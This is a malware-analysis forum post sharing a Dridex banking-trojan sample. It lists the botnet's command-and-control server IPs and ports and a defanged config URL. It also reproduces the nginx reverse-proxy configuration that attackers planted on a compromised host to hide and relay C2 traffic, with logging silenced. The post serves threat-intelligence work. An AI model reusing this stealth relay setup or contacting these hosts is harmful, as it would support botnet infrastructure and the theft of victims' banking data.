chimung wrote:Does anyone get recently Dridex sample?Sample of the day attached
https://www.virustotal.com/fr/file/dc3c ... /analysis/
<botnet>120</botnet>
<server_list>
104.131.59.185:243
1.179.170.7:4493
78.47.119.93:666
80.96.150.201:9943
</server_list>
grabbed via hXXp://37.46.130.53/jasmin/authentication.php
Just for information, they make little change in the spreading proxy stuff. /tmp/.estbuild has moved to /tmp/.kerneltmp.
They reuse always the same compromise host (like hxxp://195.37.231.2 for example)
Proxy conf example for 195.37.231.2:
Code: Select all
worker_processes 2;
error_log /dev/null;
pid /tmp/.kerneltmp/nginx.pid;
events {
worker_connections 4096;
# use epoll;
}
http {
access_log /dev/null;
client_max_body_size 200m;
chunked_transfer_encoding off;
server {
listen 4493;
location /m348-2hdk-cb2 {
information;
}
ssl on; ssl_certificate /tmp/.kerneltmp/certs/server.crt; ssl_certificate_key /tmp/.kerneltmp/certs/server.key;
location / {
proxy_pass http://62.76.42.222:880;
proxy_redirect off;
proxy_set_header Host $host;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_set_header X-Real-IP $remote_addr;
proxy_connect_timeout 180;
proxy_send_timeout 180;
proxy_read_timeout 180;
proxy_buffer_size 4k;
proxy_buffers 4 32k;
proxy_busy_buffers_size 64k;
proxy_temp_file_write_size 64k;
proxy_temp_path /tmp/.kerneltmp/tmp/;
}
}
}
Attachments
infected
(109.87 KiB) Downloaded 126 times
(109.87 KiB) Downloaded 126 times